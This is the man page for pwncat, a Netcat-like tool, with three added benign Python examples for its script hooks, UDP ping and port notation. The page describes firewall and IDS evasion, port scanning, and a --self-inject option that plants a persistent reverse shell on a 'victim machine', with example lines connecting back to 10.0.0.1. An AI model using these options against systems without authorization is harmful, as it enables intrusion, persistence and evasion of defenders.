PWNCAT:(1)                       User Commands                      PWNCAT:(1)


NAME

       pwncat - pwncat

DESCRIPTION

       usage: pwncat [options] hostname port
              pwncat [options] -l [hostname] port
              pwncat [options] -z hostname port
              pwncat [options] -L [addr:]port hostname port
              pwncat [options] -R addr:port hostname port
              pwncat -V, --version
              pwncat -h, --help

       Enhanced and compatible Netcat implementation written in Python (2 and
       3) with connect, zero-i/o, listen and forward modes and techniques to
       detect and evade firewalls and intrusion detection/prevention systems.

       If no mode arguments are specified, pwncat will run in connect mode and
       act as a client to connect to a remote endpoint. If the connection to
       the remote endpoint is lost, pwncat will quit. See options for how to
       automatically reconnect.

   positional arguments:
       hostname
              Address to listen, forward, scan or connect to.

       port   [All modes] Single port to listen, forward or connect to.
              [Zero-I/O mode] Specify multiple ports to scan:
              Via list:  4444,4445,4446
              Via range: 4444-4446
              Via incr:  4444+2

   mode arguments:
       -l, --listen
              [Listen mode]: Start a server and listen for incoming
              connections. If using TCP and a connected client disconnects or
              the connection is interrupted otherwise, the server will quit.
              See -k/--keep-open to change this behaviour.

       -z, --zero
              [Zero-I/O mode]: Connect to a remote endpoint and report status
              only. Used for port scanning. See --banner for version
              detection.

       -L [addr:]port, --local [addr:]port
              [Local forward mode]: This mode will start a server and a client
              internally. The internal server will listen locally on the
              specified addr/port (given by --local [addr:]port). The server
              will then forward traffic to the internal client which connects
              to another server specified by hostname/port given via
              positional arguments. (I.e.: proxies a remote service to a local
              address)

       -R addr:port, --remote addr:port
              [Remote forward mode]: This mode will start two clients
              internally. One is connecting to the target and one is
              connecting to another pwncat/netcat server you have started
              somewhere. Once connected, it will then proxy traffic between
              you and the target. This mode should be applied on machines
              that block incoming traffic and only allow outbound. The
              connection to your listening server is given by -R/--remote
              addr:port and the connection to the target machine via the
              positional arguments.

   optional arguments:
       -e cmd, --exec cmd
              Execute shell command. Only for connect or listen mode.

       -C lf, --crlf lf
              Specify 'lf', 'crlf' or 'cr' to always force replacing line
              endings for input and output accordingly. Specify 'no' to
              completely remove any line feeds. By default it will not replace
              anything and takes what is entered (usually CRLF on Windows, LF
              on Linux and sometimes CR on MacOS).

       -n, --nodns
              Do not resolve DNS.

       --send-on-eof
              Buffer data received on stdin until EOF and send everything in
              one chunk.

       --no-shutdown
              Do not shutdown into half-duplex mode. If this option is
              passed, pwncat won't invoke shutdown on a socket after seeing
              EOF on stdin. This is provided for backward-compatibility with
              OpenBSD netcat, which exhibits this behavior.

       -v, --verbose
              Be verbose and print info to stderr. Use -v, -vv, -vvv or -vvvv
              for more verbosity. The server performance will decrease
              drastically if you use it more than three times.

       --info type
              Show additional info about sockets, IPv4/6 or TCP opts applied
              to the current socket connection. Valid parameters are 'sock',
              'ipv4', 'ipv6', 'tcp' or 'all'. Note, you must at least be in
              INFO verbose mode in order to see them (-vv).

       -c str, --color str
              Colored log output. Specify 'always', 'never' or 'auto'. In
              'auto' mode, color is displayed as long as the output goes to a
              terminal. If it is piped into a file, color will automatically
              be disabled. This mode also disables color on Windows by
              default. (default: auto)

       --safe-word str
              All modes: If pwncat is started with this argument, it will shut
              down as soon as it receives the specified string. The
              --keep-open (server) or --reconn (client) options will be
              ignored and it won't listen again or reconnect to you. Use a
              very unique string to not have it shut down accidentally by
              other input.

   protocol arguments:
       -4     Only use IPv4 (default: IPv4 and IPv6 dualstack).

       -6     Only use IPv6 (default: IPv4 and IPv6 dualstack).

       -u, --udp
              Use UDP for the connection instead of TCP.

       -T str, --tos str
              Specifies IP Type of Service (ToS) for the connection. Valid
              values are the tokens 'mincost', 'lowcost', 'reliability',
              'throughput' or 'lowdelay'.

       --http Connect / Listen mode (TCP and UDP): Hide traffic in http
              packets to fool Firewalls/IDS/IPS.

       --https
              Connect / Listen mode (TCP and UDP): Hide traffic in https
              packets to fool Firewalls/IDS/IPS.

       -H [str [str ...]], --header [str [str ...]]
              Add HTTP headers to your request when using --http(s).

   command & control arguments:
       --self-inject cmd:host:port[s]
              Listen mode (TCP only): If you are about to inject a reverse
              shell onto the victim machine (via php, bash, nc, ncat or
              similar), start your listening server with this argument. This
              will then (as soon as the reverse shell connects) automatically
              deploy and background-run an unbreakable pwncat reverse shell
              onto the victim machine which then also connects back to you
              with specified arguments.
              Example: '--self-inject /bin/bash:10.0.0.1:4444'
              It is also possible to launch multiple reverse shells by
              specifying multiple ports.
              Via list:  --self-inject /bin/sh:10.0.0.1:4444,4445,4446
              Via range: --self-inject /bin/sh:10.0.0.1:4444-4446
              Via incr:  --self-inject /bin/sh:10.0.0.1:4444+2
              Note: this is currently an experimental feature and does not
              work on Windows remote hosts yet.

   pwncat scripting engine:
       --script-send file
              All modes (TCP and UDP): A Python scripting engine to define
              your own custom transformer function which will be executed
              before sending data to a remote endpoint. Your file must contain
              the exact following function, which will be applied as the
              transformer:

                  def transform(data, pse):
                      # NOTE: the function name must be 'transform'
                      # NOTE: the function param name must be 'data'
                      # NOTE: indentation must be 4 spaces
                      # ... your transformations go here
                      return data

              You can also define as many custom functions or classes as you
              want within this file, but ensure to prefix them uniquely to
              not collide with pwncat's functions or classes, as the file
              will be called with exec().

       --script-recv file
              All modes (TCP and UDP): A Python scripting engine to define
              your own custom transformer function which will be executed
              after receiving data from a remote endpoint. Your file must
              contain the exact following function, which will be applied as
              the transformer:

                  def transform(data, pse):
                      # NOTE: the function name must be 'transform'
                      # NOTE: the function param name must be 'data'
                      # NOTE: indentation must be 4 spaces
                      # ... your transformations go here
                      return data

              You can also define as many custom functions or classes as you
              want within this file, but ensure to prefix them uniquely to
              not collide with pwncat's functions or classes, as the file
              will be called with exec().

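       The transform() hook above, as an added example that is not part of
       this man page or of the pwncat project: a --script-recv file that
       strips terminal escape sequences and stray control bytes from whatever
       the remote endpoint sends, so a hostile peer cannot drive the
       operator's terminal (title changes, cursor movement, overwritten
       lines). It assumes Python 3, that 'data' arrives as bytes (a str is
       encoded first), and leaves the 'pse' object unused.

```python
import re

# Added example for pwncat's --script-recv hook (not from the pwncat project).
# Assumes Python 3 and that 'data' arrives as bytes; 'pse' is left unused.

# Terminal escape sequences a hostile peer could aim at the operator's
# terminal: CSI (ESC [ ... final), OSC (ESC ] ... BEL or ESC \) and the
# remaining two-byte ESC sequences.
_ESCAPE_RE = re.compile(
    br"\x1b\[[0-?]*[ -/]*[@-~]"              # CSI: params, intermediates, final
    br"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"   # OSC: up to BEL or ST
    br"|\x1b[@-Z\\-_]"                       # other Fe escapes
)
# C0 control bytes and DEL, except TAB (0x09) and LF (0x0a).
_CONTROL_RE = re.compile(br"[\x00-\x08\x0b-\x1f\x7f]")


def sanitize_remote_bytes(raw):
    """Return raw with escape sequences and control bytes removed.

    CRLF is folded to LF first so that a bare CR (which a terminal would use
    to overwrite the current line) never survives.
    """
    if isinstance(raw, str):
        raw = raw.encode("utf-8", "replace")
    cleaned = _ESCAPE_RE.sub(b"", raw)
    cleaned = cleaned.replace(b"\r\n", b"\n")
    return _CONTROL_RE.sub(b"", cleaned)


def transform(data, pse):
    # NOTE: the function name must be 'transform'
    # NOTE: the function param name must be 'data'
    # NOTE: indentation must be 4 spaces
    return sanitize_remote_bytes(data)
```

       Save it as a file and pass it with --script-recv file; the same file
       shape works for --script-send.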
   zero-i/o mode arguments:
       --banner
              Zero-I/O (TCP and UDP): Try banner grabbing during port scan.

   listen mode arguments:
       -k, --keep-open
              Listen mode (TCP only): Re-accept new clients in listen mode
              after a client has disconnected or the connection is interrupted
              otherwise. (default: server will quit after connection is gone)

       --rebind [x]
              Listen mode (TCP and UDP): If the server is unable to bind, it
              will re-initialize itself x many times before giving up. Omit
              the quantifier to rebind endlessly or specify a positive integer
              for how many times to rebind before giving up. See
              --rebind-robin for an interesting use-case. (default: fail
              after first unsuccessful try).

       --rebind-wait s
              Listen mode (TCP and UDP): Wait s seconds between
              re-initialization. (default: 1)

       --rebind-robin port
              Listen mode (TCP and UDP): If the server is unable to initialize
              (e.g.: cannot bind) and --rebind is specified, it will shuffle
              ports in round-robin mode to bind to. Use a comma separated
              string such as '80,81,82,83', a range of ports '80-83' or an
              increment '80+3'. Set --rebind to at least the number of ports
              to probe +1. This option requires --rebind to be specified.

   connect mode arguments:
       --source-addr addr
              Specify source bind IP address for connect mode.

       --source-port port
              Specify source bind port for connect mode.

       --reconn [x]
              Connect mode (TCP and UDP): If the remote server is not
              reachable or the connection is interrupted, the client will
              connect again x many times before giving up. Omit the quantifier
              to retry endlessly or specify a positive integer for how many
              times to retry before giving up. (default: quit if the remote is
              not available or the connection was interrupted) This might be
              handy for stable TCP reverse shells ;-) Note on UDP: By default
              UDP does not know if it is connected, so it will stop at the
              first port and assume it has a connection. Consider using
              --udp-sconnect with this option to make UDP aware of a
              successful connection.

       --reconn-wait s
              Connect mode (TCP and UDP): Wait s seconds between re-connects.
              (default: 1)

       --reconn-robin port
              Connect mode (TCP and UDP): If the remote server is not
              reachable or the connection is interrupted and --reconn is
              specified, the client will shuffle ports in round-robin mode to
              connect to. Use a comma separated string such as '80,81,82,83',
              a range of ports '80-83' or an increment '80+3'. Set --reconn to
              at least the number of ports to probe +1. This helps a reverse
              shell evade intrusion prevention systems that will cut your
              connection and block the outbound port. This is also useful in
              Connect or Zero-I/O mode to figure out what outbound ports are
              allowed.

       --ping-init
              Connect mode (TCP and UDP): UDP is a stateless protocol unlike
              TCP, so no handshake communication takes place and the client
              just sends data to a server without being "accepted" by the
              server first. This means a server waiting for a UDP client to
              connect is unable to send any data to the client until the
              client has sent data first. The server simply doesn't know the
              client's IP address before an initial connect. The --ping-init
              option instructs the client to send one single initial ping
              packet to the server, so that it is able to talk to the client.
              This is a way to make a UDP reverse shell work. See --ping-word
              for what char/string to send as initial ping packet (default:
              '\0')

       --ping-intvl s
              Connect mode (TCP and UDP): Instruct the client to send ping
              packets every s seconds. This allows you to restart your UDP
              server and just wait for the client to report back in. This
              might be handy for stable UDP reverse shells ;-) See --ping-word
              for what char/string to send as initial ping packet (default:
              '\0')

       --ping-word str
              Connect mode (TCP and UDP): Change the default character '\0' to
              use for udp ping. Single characters or strings are supported.

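       The initial-ping problem described under --ping-init, --ping-intvl and
       --ping-word, as an added loopback demonstration that is not code from
       this man page or the pwncat project: a UDP "server" bound on 127.0.0.1
       cannot send anything until a datagram from the client reveals the peer
       address; once the client sends the default ping word '\0', the server
       can reply. It assumes Python 3 and a working loopback interface.

```python
import socket

# Added example, not from the pwncat project. Assumes Python 3 and loopback.
PING_WORD = b"\x00"  # pwncat's default --ping-word


def udp_ping_exchange(ping_word=PING_WORD, reply=b"server-hello", timeout=0.5):
    """Show why a UDP listener needs an initial client datagram.

    Returns (heard_before_ping, payload_seen_by_server, reply_seen_by_client).
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server.settimeout(timeout)
    client.settimeout(timeout)
    try:
        server.bind(("127.0.0.1", 0))  # ephemeral port, loopback only
        # connect() on a UDP socket only fixes the default peer; no packet
        # leaves the host, so the server still has no idea who the client is.
        client.connect(server.getsockname())
        # Phase 1: no ping yet. The server has no peer address to send to,
        # so all it can do is wait; recvfrom() times out.
        try:
            server.recvfrom(1024)
            heard_before_ping = True
        except socket.timeout:
            heard_before_ping = False
        # Phase 2: the client sends the ping word (what --ping-init does).
        client.send(ping_word)
        seen, peer = server.recvfrom(1024)  # the server learns the peer here
        server.sendto(reply, peer)          # and can finally talk back
        got = client.recv(1024)
        return heard_before_ping, seen, got
    finally:
        server.close()
        client.close()
```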
       --ping-robin port
              Connect mode (TCP and UDP): Instruct the client to shuffle the
              specified ports in round-robin mode for a remote server to ping.
              This might be handy to scan outbound allowed ports. Use a comma
              separated string such as '80,81,82,83', a range of ports '80-83'
              or an increment '80+3'. Use --ping-intvl 0 to be faster.

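       The port notation shared by the positional port argument,
       --rebind-robin, --reconn-robin and --ping-robin above, as an added
       parser that is not code from this man page or the pwncat project: it
       expands the list, range and increment forms (and comma-separated
       mixtures of them) into an explicit port list and rejects malformed or
       out-of-range input. It assumes that '80+3' means 80 plus the next
       three ports, which matches the page's three equivalent examples.

```python
import re

# Added example, not from the pwncat project. Assumes '80+3' == 80..83,
# matching the man page's '80,81,82,83' / '80-83' / '80+3' examples.
_ITEM_RE = re.compile(r"(\d+)(?:([-+])(\d+))?")


def parse_port_spec(spec):
    """Expand pwncat's port notation into a list of ints.

    Items are comma separated and may be a single port ('80'), an inclusive
    range ('80-83') or an increment ('80+3': the start and the next 3 ports).
    Raises ValueError on malformed items, descending ranges or ports
    outside 1..65535.
    """
    ports = []
    for item in spec.split(","):
        item = item.strip()
        m = _ITEM_RE.fullmatch(item)
        if not m:
            raise ValueError("bad port item: %r" % item)
        start = int(m.group(1))
        if m.group(2) is None:
            end = start
        elif m.group(2) == "-":
            end = int(m.group(3))
        else:
            end = start + int(m.group(3))
        if end < start:
            raise ValueError("descending range: %r" % item)
        for port in range(start, end + 1):
            if not 1 <= port <= 65535:
                raise ValueError("port out of range: %d" % port)
            ports.append(port)
    return ports


def is_valid_port_spec(spec):
    """True if spec parses, False otherwise (handy for input validation)."""
    try:
        parse_port_spec(spec)
        return True
    except ValueError:
        return False
```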
       --udp-sconnect
              Connect mode (UDP only): Emulate stateful behaviour for the UDP
              connect phase by sending an initial packet to the server to
              validate if it is actually connected. By default, UDP will
              simply issue a connect and is not aware if it is really
              connected or not. The default connect packet to be sent is '\0',
              you can change this with --udp-sconnect-word.

       --udp-sconnect-word [str]
              Connect mode (UDP only): Change the data to be sent for UDP
              stateful connect behaviour. Note you can also omit the string to
              send an empty packet (EOF), but be aware that some servers such
              as netcat will instantly quit upon receipt of an EOF packet.
              The default is to send a null byte string: '\0'.

   misc arguments:
       -h, --help
              Show this help message and exit

       -V, --version
              Show version information and exit


https://github.com/cytopia/pwncat  June 2020                        PWNCAT:(1)